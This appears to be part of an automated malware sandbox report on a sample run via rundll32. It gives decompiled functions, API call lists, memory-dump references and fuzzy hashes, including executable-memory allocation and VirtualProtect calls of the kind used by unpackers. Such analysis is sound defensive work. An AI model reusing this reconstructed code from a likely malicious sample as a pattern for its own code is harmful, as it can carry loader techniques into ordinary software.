VirtualFree.KERNELBASE(?,00000000,00008000), ref: 010819AE

Strings

Dec 26 2021, xrefs: 01081911

Memory Dump Source

Source File: 00000003.00000002.315781287.0000000001080000.00000040.00000800.00020000.00000000.sdmp, Offset: 01080000, based on PE: true

Associated: 00000003.00000002.315796531.0000000001085000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_1080000_rundll32.jbxd

Yara matches

Similarity

API ID: Virtual$AllocFree
String ID: Dec 26 2021
API String ID: 2087232378-1220097468
Opcode ID: a49a3089fa5736c9568f89b9eaeb1c4a3af6c24e2837aaa0463557f35cb14e34
Instruction ID: 3f41d831c33d2d4dc729d7495b406e70f6b3cd57216b93d37edf017ff5b8a2fe
Opcode Fuzzy Hash: a49a3089fa5736c9568f89b9eaeb1c4a3af6c24e2837aaa0463557f35cb14e34
Instruction Fuzzy Hash: E8412871A0421A9FDB11DF98D980BEEBBF8BF08314F144169E9C5FB241D375AA06CB90

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA320 Relevance: 3.2, APIs: 2, Instructions: 195
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00EDA36B
VirtualProtect.KERNELBASE(?,?,00000000), ref: 00EDA512

Memory Dump Source

Source File: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ed0000_rundll32.jbxd

Yara matches

Similarity

API ID: Virtual$AllocProtect
String ID:
API String ID: 2447062925-0
Opcode ID: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
Instruction ID: 0ed6b458fd940c96c870b2e32387f541fba06bfed9a47a1109e440caae5f3a4c
Opcode Fuzzy Hash: 908ff1232115a672daceacccd1e388f79e6961393f0a3edebe41de14d0d5fad2
Instruction Fuzzy Hash: C5919875A00109DFCB48CF88D590EAEB7B6FF88304F149159E819AB346D735EA52CFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00E120F8 Relevance: 3.1, APIs: 2, Instructions: 124
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00E11A0C: RtlInitializeCriticalSection.KERNEL32(00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A22
Part of subcall function 00E11A0C: RtlEnterCriticalSection.KERNEL32(00E7F5CC,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A35
Part of subcall function 00E11A0C: LocalAlloc.KERNEL32(00000000,00000FF8,00E7F5CC,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11A5F
Part of subcall function 00E11A0C: RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E11AC9,00000000,00E11AC2,?,?,00E122A6,00E7F60C,00000000,00000000,?,?,00E11C95,00E11CAA,00E11DFB), ref: 00E11ABC

RtlEnterCriticalSection.KERNEL32(00E7F5CC,00000000,00E12274), ref: 00E12143
RtlLeaveCriticalSection.KERNEL32(00E7F5CC,00E1227B), ref: 00E1226E

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: CriticalSection$EnterLeave$AllocInitializeLocal
String ID:
API String ID: 2227675388-0
Opcode ID: ef61cb8c78ce2eacb150ce7ffc2e4a0cf4117b85617622713757e7dc7589be9b
Instruction ID: db5e3692d350d2e849497eccfa84754601698180ecfd908e11f72662b56a9ab9
Opcode Fuzzy Hash: ef61cb8c78ce2eacb150ce7ffc2e4a0cf4117b85617622713757e7dc7589be9b
Instruction Fuzzy Hash: 2241DEB2A05340AFDB14CF69EC816A977E0FB59314B15A2BDD619F72A1E23098D5CB40

Uniqueness

Uniqueness Score: -1.00%

Function 00EDA740 Relevance: 3.1, APIs: 2, Instructions: 86
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualProtect.KERNELBASE(?,00000004,00000040,?), ref: 00EDA7DB
VirtualProtect.KERNELBASE(?,00000004,?,?), ref: 00EDA813

Memory Dump Source

Source File: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ed0000_rundll32.jbxd

Yara matches

Similarity

API ID: ProtectVirtual
String ID:
API String ID: 544645111-0
Opcode ID: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
Instruction ID: d02236d8a254a9976e9b65c809b6d1c0e62a8009adcbe97a5c3e68d18206646a
Opcode Fuzzy Hash: 0a894fec6175854ae8b2712809d142e72fa9094a0c42227173d89027c1b642ac
Instruction Fuzzy Hash: DC416674E00209DFCB08CF88C895AEDB7B6FF88314F1481A9E915AB355D775AA42CF94

Uniqueness

Uniqueness Score: -1.00%

Function 00ED9DD0 Relevance: 3.0, APIs: 1, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00003000,00000040), ref: 00ED9E54

Strings

VirtualAlloc, xrefs: 00ED9E39, 00ED9E3C

Memory Dump Source

Source File: 00000003.00000002.315692460.0000000000ED0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00ED0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_ed0000_rundll32.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: VirtualAlloc
API String ID: 4275171209-164498762
Opcode ID: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
Instruction ID: 314d91b97806967d572a5d01a174b295d44570389358683d3b6f65e643a01ff3
Opcode Fuzzy Hash: 0a7b03ca3328d8d5ce176abfae7b90b625f1715e0bfc58100f669a5480e56ec7
Instruction Fuzzy Hash: CB1130A0D08289EAEB01D7E898097EFBFB55B11708F044099D5447A282D2BA575987A6

Uniqueness

Uniqueness Score: -1.00%

Function 00E11524 Relevance: 2.5, APIs: 2, Instructions: 37
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E11524(void* __eax, void** __edx) {
				void* _t3;
				void** _t8;
				void* _t11;
				long _t14;

				_t8 = __edx;
				if(__eax >= 0x100000) {
					_t14 = __eax + 0x0000ffff & 0xffff0000;
				} else {
					_t14 = 0x100000;
				}
				_t8[1] = _t14;
				_t3 = VirtualAlloc(0, _t14, 0x2000, 1); // executed
				_t11 = _t3;
				 *_t8 = _t11;
				if(_t11 != 0) {
					_t3 = E00E113D8(0xe7f5ec, _t8);
					if(_t3 == 0) {
						VirtualFree( *_t8, 0, 0x8000);
						 *_t8 = 0;
						return 0;
					}
				}
				return _t3;
			}

0x00e11527
0x00e11531
0x00e11540
0x00e11533
0x00e11533
0x00e11533
0x00e11546
0x00e11553
0x00e11558
0x00e1155a
0x00e1155e
0x00e11567
0x00e1156e
0x00e1157a
0x00e11581
0x00000000
0x00e11581
0x00e1156e
0x00e11586

APIs

VirtualAlloc.KERNEL32(00000000,?,00002000,00000001,?,?,?,00E1182D), ref: 00E11553
VirtualFree.KERNEL32(00000000,00000000,00008000,00000000,?,00002000,00000001,?,?,?,00E1182D), ref: 00E1157A

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Virtual$AllocFree
String ID:
API String ID: 2087232378-0
Opcode ID: 4b69a9b64a3d2163cbbea1da9f21f7214fb6c2ee47d4543fc76541b8bd9cc743
Instruction ID: 856989893322668e083d0726bc1dac2830dbe28448550cc3d928ffde8cef7158
Opcode Fuzzy Hash: 4b69a9b64a3d2163cbbea1da9f21f7214fb6c2ee47d4543fc76541b8bd9cc743
Instruction Fuzzy Hash: CFF082B2A0062057DB60596A5C85BD256C69B85B90F1951F0FB0DFF2C9D6A18C8182A1

Uniqueness

Uniqueness Score: -1.00%

Function 00E15340 Relevance: 1.5, APIs: 1, Instructions: 26
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E15340(void* __eax) {
				char _v272;
				intOrPtr _t14;
				void* _t16;
				intOrPtr _t18;
				intOrPtr _t19;

				_t16 = __eax;
				if( *((intOrPtr*)(__eax + 0x10)) == 0) {
					_t3 = _t16 + 4; // 0xe10000
					GetModuleFileNameA( *_t3,  &_v272, 0x105);
					_t14 = E00E1557C(_t19); // executed
					_t18 = _t14;
					 *((intOrPtr*)(_t16 + 0x10)) = _t18;
					if(_t18 == 0) {
						_t5 = _t16 + 4; // 0xe10000
						 *((intOrPtr*)(_t16 + 0x10)) =  *_t5;
					}
				}
				return  *((intOrPtr*)(_t16 + 0x10));
			}

0x00e15348
0x00e1534e
0x00e1535a
0x00e1535e
0x00e15367
0x00e1536c
0x00e1536e
0x00e15373
0x00e15375
0x00e15378
0x00e15378
0x00e15373
0x00e15386

APIs

GetModuleFileNameA.KERNEL32(00E10000,?,00000105), ref: 00E1535E

Part of subcall function 00E1557C: GetModuleFileNameA.KERNEL32(00000000,?,00000105,?,00E7C0A4), ref: 00E15598
Part of subcall function 00E1557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155B6
Part of subcall function 00E1557C: RegOpenKeyExA.ADVAPI32(80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105,?,00E7C0A4), ref: 00E155D4
Part of subcall function 00E1557C: RegOpenKeyExA.ADVAPI32(80000001,Software\Borland\Delphi\Locales,00000000,000F0019,?,80000002,Software\Borland\Locales,00000000,000F0019,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000), ref: 00E155F2
Part of subcall function 00E1557C: RegQueryValueExA.ADVAPI32(?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?), ref: 00E1563B
Part of subcall function 00E1557C: RegQueryValueExA.ADVAPI32(?,00E157E8,00000000,00000000,?,?,?,?,00000000,00000000,?,?,00000000,00E15681,?,80000001), ref: 00E15659
Part of subcall function 00E1557C: RegCloseKey.ADVAPI32(?,00E15688,00000000,?,?,00000000,00E15681,?,80000001,Software\Borland\Locales,00000000,000F0019,?,00000000,?,00000105), ref: 00E1567B

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: Open$FileModuleNameQueryValue$Close
String ID:
API String ID: 2796650324-0
Opcode ID: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
Instruction ID: 47a63032aed66f4f9c989ea5a1a609c07a3741fc1bb8b110743360aabf4198c4
Opcode Fuzzy Hash: 1c333c546541f2b90816c7a902ffb1918a2617d41d5f359c28264f9ad83b6de8
Instruction Fuzzy Hash: 21E06D72A00610CBCB14DE6CC8C1A8633E8AB48794F001995ED64DF24AE3B0DDA08BD0

Uniqueness

Uniqueness Score: -1.00%

Function 00E116B8 Relevance: 1.3, APIs: 1, Instructions: 54
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E116B8(signed int __eax, void** __ecx, intOrPtr __edx) {
				signed int _v20;
				void** _v24;
				void* _t15;
				void** _t16;
				void* _t17;
				signed int _t27;
				intOrPtr* _t29;
				void* _t31;
				intOrPtr* _t32;

				_v24 = __ecx;
				 *_t32 = __edx;
				_t31 = __eax & 0xfffff000;
				_v20 = __eax +  *_t32 + 0x00000fff & 0xfffff000;
				 *_v24 = _t31;
				_t15 = _v20 - _t31;
				_v24[1] = _t15;
				_t29 =  *0xe7f5ec; // 0x902cbc
				while(_t29 != 0xe7f5ec) {
					_t17 =  *(_t29 + 8);
					_t27 =  *((intOrPtr*)(_t29 + 0xc)) + _t17;
					if(_t31 > _t17) {
						_t17 = _t31;
					}
					if(_t27 > _v20) {
						_t27 = _v20;
					}
					if(_t27 > _t17) {
						_t15 = VirtualAlloc(_t17, _t27 - _t17, 0x1000, 4); // executed
						if(_t15 == 0) {
							_t16 = _v24;
							 *_t16 = 0;
							return _t16;
						}
					}
					_t29 =  *_t29;
				}
				return _t15;
			}

0x00e116bf
0x00e116c3
0x00e116ca
0x00e116df
0x00e116e7
0x00e116ed
0x00e116f3
0x00e116f6
0x00e1173a
0x00e116fe
0x00e11704
0x00e11708
0x00e1170a
0x00e1170a
0x00e11710
0x00e11712
0x00e11712
0x00e11718
0x00e11725
0x00e1172c
0x00e1172e
0x00e11734
0x00000000
0x00e11734
0x00e1172c
0x00e11738
0x00e11738
0x00e11749

APIs

VirtualAlloc.KERNEL32(?,?,00001000,00000004), ref: 00E11725

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 1ea95792d93f2a827ef2f2e218774e02db653ddb3eb74aeaa08ca249b985d082
Instruction ID: a75f1e3c77e5912b68a8e9381fca3af73583602d1b2e0a6e6d8bf85730e99983
Opcode Fuzzy Hash: 1ea95792d93f2a827ef2f2e218774e02db653ddb3eb74aeaa08ca249b985d082
Instruction Fuzzy Hash: A411CE76A047019FC310DF29CC80A9ABBE5EFC5764F05C6BDE698AB394D630AC808B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E2DCE8 Relevance: 1.3, APIs: 1, Instructions: 52
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E00E2DCE8(intOrPtr _a4, intOrPtr _a8) {
				void* _t14;
				void _t15;
				intOrPtr _t25;
				char* _t26;
				void* _t35;

				if( *0xe7f88c == 0) {
					_t14 = VirtualAlloc(0, 0x1000, 0x1000, 0x40); // executed
					_t35 = _t14;
					_t15 =  *0xe7f888; // 0x8d0000
					 *_t35 = _t15;
					_t1 = _t35 + 4; // 0x4
					E00E128C8(0xe7c408, 2, _t1);
					_t2 = _t35 + 5; // 0x5
					 *((intOrPtr*)(_t35 + 6)) = E00E2DCE0(_t2, E00E2DCC0);
					_t4 = _t35 + 0xa; // 0xa
					_t26 = _t4;
					do {
						 *_t26 = 0xe8;
						_t5 = _t35 + 4; // 0x4
						 *((intOrPtr*)(_t26 + 1)) = E00E2DCE0(_t26, _t5);
						 *((intOrPtr*)(_t26 + 5)) =  *0xe7f88c;
						 *0xe7f88c = _t26;
						_t26 = _t26 + 0xd;
					} while (_t26 - _t35 < 0xffc);
					 *0xe7f888 = _t35;
				}
				_t25 =  *0xe7f88c;
				 *0xe7f88c =  *((intOrPtr*)(_t25 + 5));
				 *((intOrPtr*)(_t25 + 5)) = _a4;
				 *((intOrPtr*)(_t25 + 9)) = _a8;
				return  *0xe7f88c;
			}

0x00e2dcf6
0x00e2dd06
0x00e2dd0b
0x00e2dd0d
0x00e2dd12
0x00e2dd14
0x00e2dd21
0x00e2dd2b
0x00e2dd33
0x00e2dd36
0x00e2dd36
0x00e2dd39
0x00e2dd39
0x00e2dd3c
0x00e2dd46
0x00e2dd4b
0x00e2dd4e
0x00e2dd50
0x00e2dd57
0x00e2dd5e
0x00e2dd5e
0x00e2dd66
0x00e2dd6b
0x00e2dd70
0x00e2dd76
0x00e2dd7d

APIs

VirtualAlloc.KERNEL32(00000000,00001000,00001000,00000040), ref: 00E2DD06

Memory Dump Source

Source File: 00000003.00000002.315530720.0000000000E11000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000003.00000002.315524545.0000000000E10000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315612504.0000000000E7C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000003.00000002.315631404.0000000000E83000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_e10000_rundll32.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 579f32a05cc2f35e332b4a81a59a8ece7af0675d64e6c7a77f0a0c6e91e83be3
Instruction ID: 62fed4c5f04aefd64be9db9f2f940da40d32f9f317622602155f2e647ddcd853
Opcode Fuzzy Hash: 579f32a05cc2f35e332b4a81a59a8ece7af0675d64e6c7a77f0a0c6e91e83be3
Instruction Fuzzy Hash: 6F1148742443158FD714DF19EC81B86FBE5EB88360B20D53AEA58AB389D370E845CBA1

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00E34154 Relevance: 48.5, APIs: 32, Instructions: 500
windowCOMMON

Download Yara Rule

C-Code - Quality: 72%

			E00E34154(struct HBITMAP__* __eax, struct HPALETTE__* __ecx, struct HPALETTE__* __edx, intOrPtr _a4, signed int _a8) {
				struct HBITMAP__* _v8;
				struct HPALETTE__* _v12;
				struct HPALETTE__* _v16;
				struct HPALETTE__* _v20;
				void* _v24;
				struct HDC__* _v28;
				struct HDC__* _v32;
				struct HDC__* _v36;
				BITMAPINFO* _v40;
				void* _v44;
				intOrPtr _v48;
				struct tagRGBQUAD _v52;
				struct HPALETTE__* _v56;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v132;
				intOrPtr _v136;
				void _v140;
				struct tagRECT _v156;
				void* __ebx;
				void* __ebp;
				signed short _t229;
				int _t281;
				signed int _t290;
				signed short _t292;
				struct HBRUSH__* _t366;
				struct HPALETTE__* _t422;
				signed int _t441;
				intOrPtr _t442;
				intOrPtr _t444;
				intOrPtr _t445;
				void* _t455;
				void* _t457;
				void* _t459;
				intOrPtr _t460;

				_t457 = _t459;
				_t460 = _t459 + 0xffffff68;
				_push(_t419);
				_v16 = __ecx;
				_v12 = __edx;
				_v8 = __eax;
				_v20 = 0;
				if( *(_a8 + 0x18) == 0 ||  *(_a8 + 0x1c) != 0 &&  *(_a8 + 0x20) != 0) {
					if( *(_a8 + 0x18) != 0 ||  *(_a8 + 4) != 0 &&  *(_a8 + 8) != 0) {
						E00E33D10(_v8);
						_v116 = 0;
						if(_v8 != 0 && GetObjectA(_v8, 0x54,  &_v140) < 0x18) {
							E00E31054();
						}
						_v28 = E00E31174(GetDC(0));
						_v32 = E00E31174(CreateCompatibleDC(_v28));
						_push(_t457);
						_push(0xe347a2);
						_push( *[fs:edx]);
						 *[fs:edx] = _t460;
						if( *(_a8 + 0x18) >= 0x28) {
							_v40 = E00E126CC(0x42c);
							_push(_t457);
							_push(0xe344ac);
							_push( *[fs:edx]);
							 *[fs:edx] = _t460;
							 *(_a8 + 0x18) = 0x28;
							 *((short*)(_a8 + 0x24)) = 1;
							if( *(_a8 + 0x26) == 0) {
								_t290 = GetDeviceCaps(_v28, 0xc);
								_t292 = GetDeviceCaps(_v28, 0xe);
								_t419 = _t290 * _t292;
								 *(_a8 + 0x26) = _t290 * _t292;
							}
							memcpy(_v40, _a8 + 0x18, 0xa << 2);
							 *(_a8 + 4) =  *(_a8 + 0x1c);
							_t441 = _a8;
							 *(_t441 + 8) =  *(_a8 + 0x20);
							if( *(_a8 + 0x26) > 8) {
								_t229 =  *(_a8 + 0x26);
								if(_t229 == 0x10) {
									L30:
									if(( *(_a8 + 0x28) & 0x00000003) != 0) {
										E00E34108(_a8);
										_t104 =  &(_v40->bmiColors); // 0x29
										_t441 = _t104;
										E00E128C8(_a8 + 0x40, 0xc, _t441);
									}
								} else {
									_t441 = _a8;
									if(_t229 == 0x20) {
										goto L30;
									}
								}
							} else {
								if( *(_a8 + 0x26) != 1 || _v8 != 0 && _v120 != 0) {
									if(_v16 == 0) {
										if(_v8 != 0) {
											_v24 = SelectObject(_v32, _v8);
											if(_v116 <= 0 || _v120 == 0) {
												asm("cdq");
												GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, 0, _v40, 0);
											} else {
												_t281 = GetDIBColorTable(_v32, 0, 0x100,  &(_v40->bmiColors));
												_t441 = _a8;
												 *(_t441 + 0x38) = _t281;
											}
											SelectObject(_v32, _v24);
										}
									} else {
										_t76 =  &(_v40->bmiColors); // 0x29
										_t441 = _t76;
										E00E31908(_v16, 0xff, _t441);
									}
								} else {
									_t441 = 0;
									_v40->bmiColors = 0;
									 *((intOrPtr*)(_v40 + 0x2c)) = 0xffffff;
								}
							}
							_v20 = E00E31174(CreateDIBSection(_v28, _v40, 0,  &_v44, 0, 0));
							if(_v44 == 0) {
								E00E310CC(_t419);
							}
							if(_v8 == 0 ||  *(_a8 + 0x1c) != _v136 ||  *(_a8 + 0x20) != _v132 ||  *(_a8 + 0x26) <= 8) {
								_pop(_t442);
								 *[fs:eax] = _t442;
								_push(0xe344b3);
								return E00E126EC(_v40);
							} else {
								asm("cdq");
								GetDIBits(_v32, _v8, 0, ( *(_a8 + 0x20) ^ _t441) - _t441, _v44, _v40, 0);
								E00E13AAC();
								E00E13AAC();
								goto L58;
							}
						} else {
							if(( *(_a8 + 0x10) |  *(_a8 + 0x12)) != 1) {
								_v20 = E00E31174(CreateCompatibleBitmap(_v28,  *(_a8 + 4),  *(_a8 + 8)));
							} else {
								_v20 = E00E31174(CreateBitmap( *(_a8 + 4),  *(_a8 + 8), 1, 1, 0));
							}
							E00E31174(_v20);
							_v24 = E00E31174(SelectObject(_v32, _v20));
							_push(_t457);
							_push(0xe34753);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_push(_t457);
							_push(0xe34742);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							_v56 = 0;
							_t422 = 0;
							if(_v16 != 0) {
								_v56 = SelectPalette(_v32, _v16, 0);
								RealizePalette(_v32);
							}
							_push(_t457);
							_push(0xe34720);
							_push( *[fs:eax]);
							 *[fs:eax] = _t460;
							if(_a4 == 0) {
								PatBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), 0xff0062);
							} else {
								_t366 = E00E30724( *((intOrPtr*)(_a4 + 0x14)));
								E00E25C48(0,  *(_a8 + 4), 0,  &_v156,  *(_a8 + 8));
								FillRect(_v32,  &_v156, _t366);
								SetTextColor(_v32, E00E2FA64( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
								SetBkColor(_v32, E00E2FA64(E00E306E8( *((intOrPtr*)(_a4 + 0x14)))));
								if( *(_a8 + 0x26) == 1 &&  *((intOrPtr*)(_a8 + 0x14)) != 0) {
									_v52 = E00E2FA64( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18)));
									_v48 = E00E2FA64(E00E306E8( *((intOrPtr*)(_a4 + 0x14))));
									SetDIBColorTable(_v32, 0, 2,  &_v52);
								}
							}
							if(_v8 == 0) {
								_pop(_t444);
								 *[fs:eax] = _t444;
								_push(0xe34727);
								if(_v16 != 0) {
									return SelectPalette(_v32, _v56, 0xffffffff);
								}
								return 0;
							} else {
								_v36 = E00E31174(CreateCompatibleDC(_v28));
								_push(_t457);
								_push(0xe346f6);
								_push( *[fs:eax]);
								 *[fs:eax] = _t460;
								_t455 = E00E31174(SelectObject(_v36, _v8));
								if(_v12 != 0) {
									_t422 = SelectPalette(_v36, _v12, 0);
									RealizePalette(_v36);
								}
								if(_a4 != 0) {
									SetTextColor(_v36, E00E2FA64( *((intOrPtr*)( *((intOrPtr*)(_a4 + 0xc)) + 0x18))));
									SetBkColor(_v36, E00E2FA64(E00E306E8( *((intOrPtr*)(_a4 + 0x14)))));
								}
								BitBlt(_v32, 0, 0,  *(_a8 + 4),  *(_a8 + 8), _v36, 0, 0, 0xcc0020);
								if(_v12 != 0) {
									SelectPalette(_v36, _t422, 0xffffffff);
								}
								E00E31174(SelectObject(_v36, _t455));
								_pop(_t445);
								 *[fs:eax] = _t445;
								_push(0xe346fd);
								return DeleteDC(_v36);
							}
						}
					} else {
						goto L58;
					}
				} else {
					L58:
					return _v20;
				}
			}

0x00e34155
0x00e34157
0x00e3415d
0x00e34160
0x00e34163
0x00e34166
0x00e3416b
0x00e34175
0x00e34198
0x00e341b7
0x00e341be
0x00e341c5
0x00e341de
0x00e341de
0x00e341ef
0x00e34200
0x00e34205
0x00e34206
0x00e3420b
0x00e3420e
0x00e34218
0x00e34282
0x00e34287
0x00e34288
0x00e3428d
0x00e34290
0x00e34296
0x00e342a0
0x00e342ae
0x00e342b6
0x00e342c3
0x00e342c8
0x00e342cf
0x00e342cf
0x00e342e3
0x00e342ee
0x00e342f7
0x00e342fa
0x00e34305
0x00e343d5
0x00e343dd
0x00e343e8
0x00e343ef
0x00e343f4
0x00e343fc
0x00e343fc
0x00e3440a
0x00e3440a
0x00e343df
0x00e343df
0x00e343e6
0x00000000
0x00000000
0x00e343e6
0x00e3430b
0x00e34313
0x00e34341
0x00e3435f
0x00e34372
0x00e34379
0x00e343ae
0x00e343be
0x00e34381
0x00e34393
0x00e34398
0x00e3439b
0x00e3439b
0x00e343cb
0x00e343cb
0x00e34343
0x00e34346
0x00e34346
0x00e34351
0x00e34351
0x00e34321
0x00e34324
0x00e34326
0x00e34332
0x00e34332
0x00e34313
0x00e3442b
0x00e34432
0x00e34434
0x00e34434
0x00e3443d
0x00e34498
0x00e3449b
0x00e3449e
0x00e344ab
0x00e34462
0x00e34472
0x00e34482
0x00e34487
0x00e3448c
0x00000000
0x00e3448c
0x00e3421a
0x00e3422c
0x00e34270
0x00e3422e
0x00e3424c
0x00e3424c
0x00e344b6
0x00e344cd
0x00e344d2
0x00e344d3
0x00e344d8
0x00e344db
0x00e344e0
0x00e344e1
0x00e344e6
0x00e344e9
0x00e344ee
0x00e344f1
0x00e344f7
0x00e34508
0x00e3450f
0x00e3450f
0x00e34516
0x00e34517
0x00e3451c
0x00e3451f
0x00e34526
0x00e345fc
0x00e3452c
0x00e34532
0x00e34550
0x00e34560
0x00e34578
0x00e34592
0x00e3459f
0x00e345b8
0x00e345cb
0x00e345da
0x00e345da
0x00e3459f
0x00e34605
0x00e346ff
0x00e34702
0x00e34705
0x00e3470e
0x00000000
0x00e3471a
0x00e3471f
0x00e3460b
0x00e34619
0x00e3461e
0x00e3461f
0x00e34624
0x00e34627
0x00e3463c
0x00e34642
0x00e34653
0x00e34659
0x00e34659
0x00e34662
0x00e34677
0x00e34691
0x00e34691
0x00e346b9
0x00e346c2
0x00e346cb
0x00e346cb
0x00e346da
0x00e346e1
0x00e346e4
0x00e346e7
0x00e346f5
0x00e346f5
0x00e34605
0x00000000
0x00000000
0x00000000
0x00e347a9
0x00e347a9
0x00e347b2
0x00e347b2

APIs

GetObjectA.GDI32(00000000,00000054,?), ref: 00E341D4
GetDC.USER32(00000000), ref: 00E341E5
CreateCompatibleDC.GDI32(00000000), ref: 00E341F6
CreateBitmap.GDI32(00000000,?,00000001,00000001,00000000), ref: 00E34242
CreateCompatibleBitmap.GDI32(00000028,00000000,?), ref: 00E34266
SelectObject.GDI32(?,?), ref: 00E344C3
SelectPalette.GDI32(?,00000000,00000000), ref: 00E34503
RealizePalette.GDI32(?), ref: 00E3450F
SetTextColor.GDI32(?,00000000), ref: 00E34578
SetBkColor.GDI32(?,00000000), ref: 00E34592
SetDIBColorTable.GDI32(?,00000000,00000002,?,?,00000000,?,00000000,?,?,00000000,00000000,00E34720,?,00000000,00E34742), ref: 00E345DA
FillRect.USER32 ref: 00E34560

Part of subcall function 00E2FA64: GetSysColor.USER32(?), ref: 00E2FA6E

PatBlt.GDI32(?,00000000,00000000,?,?,00FF0062), ref: 00E345FC
CreateCompatibleDC.GDI32(00000028), ref: 00E3460F
SelectObject.GDI32(?,00000000), ref: 00E34632
SelectPalette.GDI32(?,00000000,00000000), ref: 00E3464E
RealizePalette.GDI32(?), ref: 00E34659
SetTextColor.GDI32(?,00000000), ref: 00E34677
SetBkColor.GDI32(?,00000000), ref: 00E34691
